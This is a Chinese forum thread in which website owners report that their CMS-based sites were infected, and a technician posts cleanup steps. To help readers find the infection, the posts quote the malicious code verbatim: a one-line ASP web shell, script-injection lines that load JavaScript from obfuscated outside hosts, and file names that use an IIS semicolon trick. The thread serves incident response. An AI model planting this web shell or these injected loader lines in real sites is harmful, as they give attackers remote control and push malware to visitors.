技术员来看看，我网站被挂马了！（技术已回复）

pan888

技术员来看看，我网站被挂马了！地址：www.vovjob.com  QQ：237154335

技术答复：解决办法如下
第一步：修改后台路径，凡是被挂马的站点必须修改后台路径，修改目录名称后在后台网站配置里边修改对应的目录名称；
第二步：修改所有管理员的密码，密码由字母大小写特殊符合及数字不规则排列组成，密码长度最好为12位以上；
第三步：打开（8月24日）的站点日志，查找“59.55.175.235”、“59.55.171.180”，查找的结果会出现类似
2009-08-24 10:25:56 W3SVC887146513 220.187.26.66 POST /Admin/Hr/bottum.asp - 80 - 59.55.175.235
在网站空间里找出对应的文件，用记事本打开查看代码，如果文件代码类似下边这样的，那么就是木马文件，立即删除；
<%set ms = server.CreateObject(\"MSScriptControl.ScriptControl.1\")
ms.Language=\"VBScript\"
ms.AddObject \"Response\", Response
ms.AddObject \"request\", request
ms.AddObject \"session\", session
ms.AddObject \"server\", server
ms.AddObject \"application\", application
ms.ExecuteStatement (\"ex\";\"ecute(request(chr(35)))\")%>

<%execute request(\"#\")%>
第四步：重新生成模版，进入后台风格模版---模版方案管理---点网站的模版方案生成，然后在系统相关---清理系统缓存，进行清理模版缓存，如果站点开启了生成静态功能，请随后重新生成所有需要生成的文件；
第五步：清理ASP、JS中的木马代码，打开JS目录里边的文件，查看是否有document.writeln('<script type=\"text/javascript\" language=\"JavaScript\" src=\"http://c%30812.2288.org\" id=\"seraph4script2429\"  ><\/script>');
document.writeln('<script id=\"seraph3script302\" type=\"text/javascript\" src=\"http://0810.6600.o%72g\" language=\"JavaScript\"  ><\/script>');这个代码，有的话，删除该字符所在的整行代码，打开站点首页index.asp文件，查看最后一行代码如果是</script>结束的，删除%>之后的所有代码。
第六步：打开网站，浏览各频道页面及部分内容页，看是否还提示有木马提示，如果有提示，说明没有清理完整，可以通过查看源代码来找到被挂的代码，如果页面上没有，应该在JS里边，认真查看所有JS并清理。

清理的过程中如遇到遇到请跟本贴提出，禁止另开新帖，新开帖不予回复！

感谢用户chentaonc 提供详细的被修改文件列表，请对照检查自己网站的对应文件!
http://bbs.yjys.net/thread-21340-1-1.html

350701030

靠，我的今天也被挂了

pan888

document.writeln(\'<script language=\"JavaScript\" type=\"text/javascript\" src=\"http://0810.%36%3600.org\" id=\"seraph3script7240\"  ><\\/script>\');
// JavaScript Document
<!--
function fnRemoveBrank(strSource)
{
return strSource.replace(/^\\s*/,\'\').replace(/\\s*$/,\'\');


JS文件里面多了这个漏洞。

350701030

一样的 木马，整个程序都有

350701030

我的也是http://0810.6600.org/，希望官方查查啊

jyq200

我的也是这个，我看了一下iis日志，是admin/Template/Admin_Addskin.asp这个文件造成的

pan888

除了JS代码里面有document.writeln(\'<script language=\"JavaScript\" type=\"text/javascript\" src=\"http://0810.%36%3600.org\" id=\"seraph3script7240\"  ><\\/script>\');
// JavaScript Document
<!--
function fnRemoveBrank(strSource)
{
return strSource.replace(/^\\s*/,\'\').replace(/\\s*$/,\'\');
这个以外，还有就是后台查看HTML文件有一个help.asp;.jpg得文件，CSS样式也多了一个default.asp;.css的文件。现在我把它们清除了，然后把FOS关掉，不知道能不能顶得住，希望官方的老大看一下。谢谢！

pan888

除了JS代码里面有document.writeln(\'<script language=\"JavaScript\" type=\"text/javascript\" src=\"http://0810.%36%3600.org\" id=\"seraph3script7240\"  ><\\/script>\');
// JavaScript Document
<!--
function fnRemoveBrank(strSource)
{
return strSource.replace(/^\\s*/,\'\').replace(/\\s*$/,\'\');
这个以外，还有就是后台查看HTML文件有一个help.asp;.jpg得文件，CSS样式也多了一个default.asp;.css的文件。现在我把它们清除了，然后把FOS关掉，不知道能不能顶得住，希望官方的老大看一下。谢谢！

木野真情

document.writeln(\'<script language=\"JavaScript\" type=\"text/javascript\" src=\"http://08%310.6600.org\" id=\"seraph3script5390\"  ><\\/script>\');
_dwrite(\"<script language=javascript src=\"+url+\"/count.asp?style=\"+style+\"&referer=\"+escape(document.referrer)+\"></script>\");
function _dwrite(string) {document.write(string);}看看。我的也是的 。

pan888

呵呵，等官方出补丁吧。大哥们冲啊~